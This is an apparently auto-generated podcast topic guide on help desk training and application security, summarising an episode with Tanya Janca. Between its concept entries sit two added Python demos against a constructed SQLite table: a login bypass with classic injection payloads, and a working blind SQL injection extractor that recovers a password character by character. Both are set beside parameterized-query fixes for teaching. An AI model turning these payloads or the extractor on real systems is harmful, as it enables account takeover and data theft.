Topic Guide
What Is Help desk training?
Help desk training is a subject covered in depth across 1 podcast episode in our database. Below you'll find key concepts, expert insights, and the top episodes to listen to, all distilled from hours of conversation by leading experts.
Key Concepts in Help desk training
Application security (appsec)
Appsec is the practice of designing, building, and testing applications so that vulnerabilities are prevented, or found and fixed, before the software ships. Tanya Janca's mission is to help software developers write more secure code, emphasizing that appsec should focus on aiding developers rather than just criticizing them.
Sql injection
SQL Injection is a code injection technique against data-driven applications: attacker-controlled input is concatenated into a SQL statement, so text typed into an entry field is executed as part of the query instead of being treated as data. It can allow attackers to bypass authentication, exfiltrate data, or even take control of the database, as Tanya experienced when her own app was exploited and later demonstrated in a CTF.
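The login bypass described above, as an added example that is not code from the episode or from Tanya Janca's own applications. It builds a constructed in-memory SQLite users table, shows a login that splices user input into the SQL text next to the same login written with bound parameters, and runs two classic payloads against both. Table layout, account names and passwords are assumptions made for the demo; passwords are stored in clear only to keep it short.

```python
import sqlite3

# Constructed sample accounts for this demo (assumption, not from the episode).
# A real application would compare against a password hash, not clear text.
SAMPLE_USERS = [
    ("admin", "s3cr3t-admin-pass"),
    ("alice", "correct horse battery staple"),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory SQLite database holding the sample users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Injectable login: user input is spliced straight into the SQL text,
    so quotes and comment markers in the input become SQL syntax."""
    sql = (
        "SELECT id FROM users WHERE username = '" + username + "' "
        "AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same check with bound parameters: the driver passes the input as data,
    so it can never change the shape of the query."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# Two classic bypass payloads. The first comments out the password check:
#   ... WHERE username = 'admin'--' AND password = 'anything'
# The second turns the WHERE clause into a tautology:
#   ... WHERE username = '' OR '1'='1' AND password = '' OR '1'='1'
BYPASS_PAYLOADS = {
    "comment out password check": ("admin'--", "anything"),
    "tautology": ("' OR '1'='1", "' OR '1'='1"),
}


def run_demo() -> dict:
    """Return, per payload, whether each login variant lets the attacker in."""
    conn = make_db()
    return {
        name: {
            "vulnerable": login_vulnerable(conn, user, pw),
            "safe": login_safe(conn, user, pw),
        }
        for name, (user, pw) in BYPASS_PAYLOADS.items()
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name}: vulnerable={result['vulnerable']} safe={result['safe']}")
```

Both payloads log in through `login_vulnerable` without a valid password and are rejected by `login_safe`; the fix is the placeholder, not input filtering, because the driver never lets bound values be parsed as SQL.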
Burp suite
Burp Suite is a widely used toolkit for security testing of web applications. Its core is an intercepting proxy that sits between the browser and the target, letting the tester capture, inspect, and modify HTTP(S) requests and responses before they are delivered, which makes analyzing and exploiting vulnerabilities straightforward; it was one of the first tools Tanya learned early in her hacking mentorship.
Blind sql injection
Blind SQL Injection is a variant of SQL injection in which the application never returns query results directly. The attacker instead injects true/false questions and reads the answer from an observable side effect, such as a different page, an error, or a delayed response. Because each request leaks only one bit, data is exfiltrated character by character over many requests, which is what Tanya eventually understood to explain a past government data breach.
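The character-by-character extraction described above, as an added example that is not code from the episode. It goes a step beyond the single true/false question in the text: the only thing the attacker can call is a constructed "does this username exist" endpoint that answers yes or no, and from that one bit per request the script recovers the admin's whole password column by binary-searching first its length and then each character's code point. The table layout, the `admin` account, the secret value, and the printable-ASCII assumption are all mine for the demo.

```python
import sqlite3

# Constructed secret for the demo (assumption); the attacker never reads it directly.
SECRET_PASSWORD = "Tr0ub4dor&3"


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database with one user whose password we will steal blind."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        ("admin", SECRET_PASSWORD),
    )
    return conn


def user_exists_vulnerable(conn: sqlite3.Connection, username: str) -> bool:
    """Injectable endpoint that leaks exactly one bit per request: whether the
    query matched a row (think 'username taken' vs 'username available')."""
    sql = "SELECT id FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchone() is not None


def blind_extract(oracle, column: str = "password", max_len: int = 64):
    """Recover users.<column> for 'admin' using only yes/no answers.

    oracle(username) -> bool is the only capability the attacker has.
    Returns (recovered_value, number_of_requests)."""
    queries = 0

    def ask(condition: str) -> bool:
        # Injected clause becomes: WHERE username = 'admin' AND (<condition>) --'
        nonlocal queries
        queries += 1
        return oracle("admin' AND (" + condition + ") --")

    def search(predicate_for, lo: int, hi: int) -> int:
        # Binary search for the value v in [lo, hi]: ask "value > mid" and
        # narrow the range until one candidate is left (assumes lo <= v <= hi).
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(predicate_for(mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    length = search(lambda n: f"length({column}) > {n}", 0, max_len)
    chars = []
    for pos in range(1, length + 1):  # SQL substr() positions are 1-based
        code = search(
            lambda n, pos=pos: f"unicode(substr({column}, {pos}, 1)) > {n}",
            32, 126,  # assumption: printable ASCII only
        )
        chars.append(chr(code))
    return "".join(chars), queries


def run_demo():
    """Wire the attacker's search against the vulnerable endpoint."""
    conn = make_db()
    return blind_extract(lambda u: user_exists_vulnerable(conn, u))


if __name__ == "__main__":
    value, queries = run_demo()
    print(f"recovered {value!r} in {queries} requests")
```

Binary search over the 95 printable ASCII codes costs at most 7 requests per character, so the whole 11-character secret falls in well under a hundred requests; with a time-based oracle the same loop works unchanged, only `ask` changes to measure response delay. On the defensive side, the fix is the same parameterized query as for ordinary injection, and the request pattern (hundreds of near-identical requests differing only in a numeric comparison) is exactly what to alert on in web logs.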
Chain of custody
In digital forensics, the chain of custody is the chronological record showing the seizure, custody, control, transfer, analysis, and disposition of physical or electronic evidence: who handled the item, when, and for what purpose, from the moment it was collected. Maintaining an unbroken chain of custody is a precondition for evidence to be admissible in court, as highlighted by the help desk incident in which the evidence was destroyed.
What Experts Say About Help desk training
1. SQL injection is a powerful attack vector that can bypass login screens and exfiltrate sensitive data, as Tanya Janca demonstrated in a Capture the Flag (CTF) challenge and experienced firsthand with her own applications.
2. Blind SQL Injection is a sophisticated technique where attackers exfiltrate data by asking the database yes/no questions, typically about one character at a time (for example, the first letter of a field), rather than directly retrieving records.
3. A complete and accurate inventory of all applications is crucial for organizational security, as demonstrated when Tanya's team discovered numerous unsecured, unknown apps during a data breach investigation.
4. Untrained IT help desk staff can escalate panic during incidents or, worse, destroy critical evidence, breaking the chain of custody for potential criminal cases, as tragically illustrated by the child exploitation image incident.
5. Organizational policies, such as designated streaming areas during the Olympics, are vital to maintain network integrity; ignoring them can lead to severe network congestion and perceived 'malware' incidents.
6. Effective incident response requires specialized training and clear protocols, ensuring that technical experts manage crises and that false alarms are welcomed over missed threats.